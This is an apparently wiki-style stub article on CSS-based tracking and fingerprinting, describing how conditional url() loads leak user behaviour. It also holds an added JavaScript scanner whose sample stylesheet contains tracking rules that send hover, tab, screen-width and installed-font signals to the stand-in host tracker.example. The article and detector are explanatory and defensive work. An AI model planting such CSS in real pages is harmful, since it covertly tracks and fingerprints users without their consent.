CSS tracking

Revision as of 01:05, 26 April 2026 by Rudxain

This article is a stub. You can help by expanding it.


CSS-based tracking and CSS fingerprinting consist of abusing the semantics of CSS in order to trick web browsers into sending data to servers.

How it works

CSS can declare that certain resources/assets be used if certain conditions are met.[1] Since browsers implement lazy-loading, this means that assets will only be requested when the conditions are met. This effectively allows pinging arbitrary URLs when a client-side event happens. Instead of referencing a single endpoint for all events, each event can be associated with a different URL, allowing the tracking-"server" to gather more data about user behavior.[2][3]

Traditionally, CSS tracking was (and still is) implemented as a limited fingerprinter, typically by enumerating installed fonts and checking window dimensions.[citation needed]

Either way, the attack has limitations, as caching can prevent repeated requests from happening (though this is not guaranteed).
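
The following JavaScript, added here as an example and not taken from the article or its sources, scans a stylesheet for url() loads that are gated by the kinds of conditions described above (media queries, state pseudo-classes, local() font fallbacks). The stylesheet, the host tracker.example and the name findConditionalLoads are constructed for illustration.

```javascript
// Added example (not from the article): list url() loads that are only fetched
// when a condition holds. SAMPLE_CSS and tracker.example are constructed.
const SAMPLE_CSS = `
body { background: url(/img/bg.png); }
@media (min-width: 1200px) { .probe { background: url("https://tracker.example/w?min=1200"); } }
a.buy:hover::after { content: url(https://tracker.example/e?hover=buy); }
#tab2:checked ~ .panel { background-image: url('https://tracker.example/e?tab=2'); }
@font-face { font-family: probe-calibri;
  src: local("Calibri"), url(https://tracker.example/f?missing=calibri); }
.uses-probe { font-family: probe-calibri; }
`;

const URL_RE = /url\(\s*(["']?)(.*?)\1\s*\)/gi;
// Preludes (selector or at-rule text before "{") that make a load conditional.
const RULES = [
  [/^@(media|supports|container)\b/i, 'conditional at-rule'],
  [/:(hover|active|focus(-within|-visible)?|checked|target)\b/i, 'state pseudo-class'],
];

// Simplified scanner: assumes no "{", "}" or ";" inside strings or url() values.
function findConditionalLoads(css) {
  const text = css.replace(/\/\*[\s\S]*?\*\//g, ''); // drop comments
  const stack = [];     // preludes of the currently open blocks
  const findings = [];
  let buf = '';         // text since the last "{", "}" or ";"
  const flush = () => { // buf holds one declaration: report its url() values
    const reasons = new Set();
    for (const p of stack)
      for (const [re, why] of RULES) if (re.test(p)) reasons.add(why);
    const top = stack[stack.length - 1] || '';
    // a src list with local() can make the url() fetch depend on installed fonts
    if (/^@font-face\b/i.test(top) && /\blocal\(/i.test(buf)) reasons.add('local() font fallback');
    if (reasons.size)
      for (const m of buf.matchAll(URL_RE))
        findings.push({ url: m[2], reasons: [...reasons], context: stack.join(' > ') });
    buf = '';
  };
  for (const ch of text) {
    if (ch === '{') { stack.push(buf.trim()); buf = ''; }
    else if (ch === '}') { flush(); stack.pop(); }
    else if (ch === ';') flush();
    else buf += ch;
  }
  return findings;
}

for (const f of findConditionalLoads(SAMPLE_CSS))
  console.log(`${f.reasons.join(', ')}: ${f.url}  [${f.context}]`);
```

Conditional loads are also common in ordinary stylesheets, so the output is a list to review, not a verdict.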

Why it is a problem

This is an insidious practice, as CSS is widely believed to be "just a declarative styling language", even though it's practically Turing-complete.[4][5] Even privacy-minded users have this misconception, which makes them equally vulnerable to this class of tracking.[citation needed] Most people believe that simply disabling JavaScript is enough. This attack breaks the expectation that HTML and CSS can only be used to make static/passive documents.

Examples

Some examples of CSS tracking include:



References